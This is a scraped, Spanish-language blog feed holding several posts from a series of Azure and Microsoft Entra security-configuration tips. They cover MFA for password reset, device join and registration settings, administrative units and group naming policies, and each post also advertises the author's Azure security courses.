overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbz0qUB-m2h5ljMcOoBz0qY5KsLg-Z7IM_oCzr7J-QvLLELvGgjrV5C4LkW2xMy3rb0Un-iTEc8ImR9Qsmxcn-o-VHLwfCN64avo-nbQFDLbL4RuhTT9q-cTVYOnKVJ72Jyqq26h9bnYRS7w_1ZtW78wtZWyW9nCcSgWzw2mVNE7-Uua1CCp0Jmqm1dAN_/s1200/formacion.seguridadsi.com%2011.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbz0qUB-m2h5ljMcOoBz0qY5KsLg-Z7IM_oCzr7J-QvLLELvGgjrV5C4LkW2xMy3rb0Un-iTEc8ImR9Qsmxcn-o-VHLwfCN64avo-nbQFDLbL4RuhTT9q-cTVYOnKVJ72Jyqq26h9bnYRS7w_1ZtW78wtZWyW9nCcSgWzw2mVNE7-Uua1CCp0Jmqm1dAN_/w640-h334/formacion.seguridadsi.com%2011.png" width="640" /></a></div></h2><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 11</b></h4><div><i>Dejar que tus usuarios puedan resetear la contraseña es algo a priori positivo. Salvo en escenarios perrugueros donde el admin quieren saber la clave de su gente para vete tu a saber...</i></div><div><i><br /></i></div><div><i>Lo que si es una buena práctica es habilitar doble mecanismo de MFA para realizar esta tarea.</i></div><div><i><br /></i></div><div><i>Imagina que accedo a una sesión abierta en un browser y no se la clave, la cambio y pongo la mía...</i></div><div><i><br /></i></div><div><i><a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/PasswordResetMenuBlade/~/AuthenticationMethods" target="_blank">Revisa como tienes esto,</a> y habilita dos mecanismos. Si aparte mandas un mail a tu gente informando de la medida, mucho mejor.</i></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-68703014982354505542024-01-18T10:31:00.003+01:002024-01-18T10:31:50.954+01:00Día 10: Revisa la configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXNq0pMp3WHERPwGi-4JWuU_1sqQSc8TcoERoWq_HyTJj4_ahwnHfZFT1lMO9U7pMndPU6ChPwPS5Uf_XUdDCuIFKzFofSgkDzc4X8N8GGLtl3NWE6_6c53-a-Km5R0Rp2KYUUyEB-FCeImrGCwpdrxOa0qsc6bBcNqMlgoDLlG0c10Rm_mIcIa011rCb/s1200/formacion.seguridadsi.com%2010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXNq0pMp3WHERPwGi-4JWuU_1sqQSc8TcoERoWq_HyTJj4_ahwnHfZFT1lMO9U7pMndPU6ChPwPS5Uf_XUdDCuIFKzFofSgkDzc4X8N8GGLtl3NWE6_6c53-a-Km5R0Rp2KYUUyEB-FCeImrGCwpdrxOa0qsc6bBcNqMlgoDLlG0c10Rm_mIcIa011rCb/w640-h334/formacion.seguridadsi.com%2010.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 10</b></h4><div>En esta ocasión, vamos a profundizar un poco más en el aspecto de como se vinculan los dipositivos en Azure, y que implicaciones de seguridad tiene. Para empezar, vamos a definir los tipos de estado de vinculación que tienen los <i>devices</i> ( teléfonos, tablets, pc, etc)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasQ46a9eF-nDsF8QkGHORXpIn8Xzbp31WoaIbeFotyixvubfQ-9ULTCi9HMX3JRvLn6Nd4njUKY6AXlzkmortxGx5_Ej9qXl0szIqu5K9uK_XzwZjJ1hmI3Nsg9P4lqUnDNzywSHXzb6lANIvfUhSojlDJ9mvtCVHReTMx3GKaZMqVvaYSk4rde_v4C6r/s1059/Captura%20de%20pantalla%202024-01-18%20a%20las%209.42.58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="596" data-original-width="1059" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasQ46a9eF-nDsF8QkGHORXpIn8Xzbp31WoaIbeFotyixvubfQ-9ULTCi9HMX3JRvLn6Nd4njUKY6AXlzkmortxGx5_Ej9qXl0szIqu5K9uK_XzwZjJ1hmI3Nsg9P4lqUnDNzywSHXzb6lANIvfUhSojlDJ9mvtCVHReTMx3GKaZMqVvaYSk4rde_v4C6r/w640-h360/Captura%20de%20pantalla%202024-01-18%20a%20las%209.42.58.png" width="640" /></a></div><div><br /></div>Esta aproximación es necesaria para trabajar con el famoso Zero Trust. Conocer el dispositivo es mucho más efectivo de... el pc está en la lan o en la wan. No es que sea más efectivo, sino que me permite más granularidad a la hora de controlar los permisos. Ejemplo sencillo, si estás en un pc corporativo te deja hacer EQUIS pero sino, te dejo hacer menos...<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ZeroTrustArchitecture-Infographic_RWQAAU?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&qlt=100&fit=constrain" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="470" data-original-width="800" height="376" src="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ZeroTrustArchitecture-Infographic_RWQAAU?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&qlt=100&fit=constrain" width="640" /></a></div><br /><div>La manera más sencilla es tomar nuestro equipo unido al dominio y unirlo al dominio Azure. <a href="https://support.microsoft.com/en-us/account-billing/join-your-work-device-to-your-work-or-school-network-ef4d6adb-5095-4e51-829e-5457430f3973" target="_blank">Aquí</a> tenéis el procedimiento para hacerlo manualmente. Lo denominamos Hybrid ya que el equipo pertenece vinculado a ambos ámbitos, el cloud y el onpremise. Podemos usar una GPO para que todos nuestros dispositivos en el dominio local se registren en Azure, con la siguiente diretiva: <em style="background: 0px 0px rgb(255, 255, 255); border: 0px; color: #333333; font-family: Georgia, "Bitstream Charter", serif; font-size: 16px; margin: 0px; padding: 0px; vertical-align: baseline;">Computer Configuration/Policies/Administrative Templates/Windows Components/Device Registration</em></div><div><br /></div><div>Otra opción es Azure AD ( Microsoft Entra) join. Es unir el dispositivo directamente a Azure, sin pasar por el escenario empresarial del dominio on-premise. Suele ser utilizaro para empresas pure-cloud. Si, que no tienen On premise...</div><div><br /></div><div>La tercera opción es tener el dispositivo <a href="https://learn.microsoft.com/en-us/entra/identity/devices/concept-device-registration">Registered.</a> Usado para escenarios en los que queremos controlar el dispositivo, pero quizás es del empleado ( BYOD)</div><div><br /></div><div>En las dos opciones tipo join, es importante conocer el detalle de como se produce la autenticación y el proceso de registro a nivel de seguridad. Como se generan certificados que permitan la "confianza" entre entornos, y como se generan claves o tokens para ser usados en la auth.</div><div>Estos procesos son los que posteriormente intentaremos explotar cuando encontramos estos dispositivos, como es el caso de robar un PRT ( Primary Refresh Token) de un equipo joined y como transformarlo en un Access token que podamos usar en otro equipo... Estas cosas son las que vemos en profundidad en el curso... Seguimos...</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://aadinternals.com/images/posts/device_register_flow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Registered" border="0" data-original-height="355" data-original-width="594" src="https://aadinternals.com/images/posts/device_register_flow.png" title="Registered" /></a></div><div style="text-align: center;">Registered</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://aadinternals.com/images/posts/device_register_flow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="594" height="355" src="https://aadinternals.com/images/posts/device_register_flow.png" width="594" /></a></div><div style="text-align: center;">Joined</div><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://aadinternals.com/images/posts/device_hybrid_flow1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="702" height="377" src="https://aadinternals.com/images/posts/device_hybrid_flow1.png" width="640" /></a></div><div style="text-align: center;">Hybrid Joined</div><div style="text-align: center;"><br /></div><div><br /></div><div>Ahora vamos con la configuración que queremos tratar en este post. esto era una pequeña introducción. Queremos <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_Devices/DevicesMenuBlade/~/DeviceSettings/menuId/" target="_blank">comprobar aquí</a>, como dejamos que nuestros usuarios registren dispositivos. Imagina un escenario en el que alguien compromete una cuenta, y envía correos desde fuera de la organización. Puede que exista un MFA para el uso de Outlook "fuera" de la empresa. Este usuario puede registrar en Azure ( gracias a las credenciales que tiene de Office... son las mismas !!! ) su equipo de trabajo y así trabajar desde un dispositivo joined, que quizás tenga una configuración más relajada para el MFA ( o más bien vamos a empezar a hablar bien, Acceso Condicional. Entiendes el "pollo" ?</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ak1xDRpcPOBGBQWzq0xrqQI_wVdTdPuRviKN4rDn5vC9yJNljPg0B3PEhlbbhaGtoa_JNwM0a_Oqa_YNOMKJhD2ir9Doni4D8Z30eNooMrofsPGsVVm45pVMkXfzlH_vByWjs2YHN1rGoqtJGE103NRXMWVXKD11qzlF6EHiigwgeFKMnM_KDfaaJZr6/s1332/Captura%20de%20pantalla%202024-01-18%20a%20las%2010.20.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="734" data-original-width="1332" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ak1xDRpcPOBGBQWzq0xrqQI_wVdTdPuRviKN4rDn5vC9yJNljPg0B3PEhlbbhaGtoa_JNwM0a_Oqa_YNOMKJhD2ir9Doni4D8Z30eNooMrofsPGsVVm45pVMkXfzlH_vByWjs2YHN1rGoqtJGE103NRXMWVXKD11qzlF6EHiigwgeFKMnM_KDfaaJZr6/w640-h352/Captura%20de%20pantalla%202024-01-18%20a%20las%2010.20.49.png" width="640" /></a></div><div><br /></div><div>Podemos ver la opción de unir o registrar. Como indica al tip, no implica a procesos automáticos como GPO y autopilot, ya que no trabajan con el contexto de usuario.</div><div>El siguiente setting, por supuesto, si permites unir dominios, habilitar el MFA para este tarea. </div><div><br /></div><div>Ten en cuenta otra cosa, estas configuraciones son independientes a que uses Intune o no.</div><div><div><div class="separator" style="clear: both; text-align: center;"><p class="p4" style="font-family: "Courier New"; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 10px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: start;"><span class="Apple-converted-space"><br /></span></p><p class="p4" style="font-family: "Courier New"; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 10px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: start;"><span class="Apple-converted-space"><br /></span></p><p class="p4" style="font-family: "Courier New"; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 10px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: start;"><span class="Apple-converted-space"><br /></span></p></div></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div></div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-32847184832669463192024-01-17T07:57:00.000+01:002024-01-17T07:57:00.300+01:00Día 9: Revisa la configuración de tu Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wB5sZzKyz8E5X7j4AVOV8A1TaHtCWXEbdpMOvBh7_7foNlQE7i014HPZXvwEAte_W3GHkO3mJRbCEuW687vMNVij9VHL97lu5FTLN3GOBFMTdevLMdCaW46X-npX1zTT9q-XOaCmRDE7LhliHvUdMKL-IUzlGtMM8kXCUhnE7B6suqM2Eypxh8zSzg34/s1200/formacion.seguridadsi.com%209.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wB5sZzKyz8E5X7j4AVOV8A1TaHtCWXEbdpMOvBh7_7foNlQE7i014HPZXvwEAte_W3GHkO3mJRbCEuW687vMNVij9VHL97lu5FTLN3GOBFMTdevLMdCaW46X-npX1zTT9q-XOaCmRDE7LhliHvUdMKL-IUzlGtMM8kXCUhnE7B6suqM2Eypxh8zSzg34/w640-h334/formacion.seguridadsi.com%209.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 9</b></h4><div><i>Conoces las UO de Active directorty, en Microsoft Entre tenemos algo parecido, las unidades administrativas. Son contenedores para agrupar recursos, y que roles van a tener esos recursos. Por ejemplo, podemos tener una unidad administrativa para que los administradores de usuarios de una compañia, tengo ese role, pero solo para un grupo de usuarios, por ejemplo de un país. En vez de tener un grupo de usuarios en Entra llamados admin_users_ Madrid, lo hago mediante la Unidad administrativa. Es una característica en Public Preview, pero bajo este contexto, <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/AdminUnit" target="_blank">te sugiero que lo revises</a>, para detectar posibles mecanismos de persistencia mediante esta función.</i></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-58593165652824152342024-01-16T09:18:00.000+01:002024-01-16T09:18:39.248+01:00Día 8: Revisa configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2 style="text-align: left;"><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdQiedzOgJn-Nfj2KmJV7s9iThrGYsqJFoBMModIYw8BeQe1xAvRpDHLo-i_IVU-QEH2OsObiNp0KX8L5y6Ckd_c4od8MXRDmAuWhgr2TZY9vkmg_TyVaN7wkziZzqof0bAo04lZUilEx4ZNyirwBFENVL7vHzfojHkShXcfcoem4IpkTzYGqMSJgMPxsD/s1200/formacion.seguridadsi.com%208.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdQiedzOgJn-Nfj2KmJV7s9iThrGYsqJFoBMModIYw8BeQe1xAvRpDHLo-i_IVU-QEH2OsObiNp0KX8L5y6Ckd_c4od8MXRDmAuWhgr2TZY9vkmg_TyVaN7wkziZzqof0bAo04lZUilEx4ZNyirwBFENVL7vHzfojHkShXcfcoem4IpkTzYGqMSJgMPxsD/w640-h334/formacion.seguridadsi.com%208.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 8</b></h4><div><i>El lenguaje. Imagina un grupo de Teams haciendo alusiones a un compañero, o acosando a una compañera, con un mote de un directivo. Hasta que punto es responsable una empresa de garantizar este código de conducta? Tenemos una directiva curiosa para <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/GroupsManagementMenuBlade/~/NamingPolicy" target="_blank">REVISAR</a> en Azure, que nos permite bloquear ciertas palabras. Una utilidad que a priori no tiene mucho que ver con la ciberseguridad, o sí...</i></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más 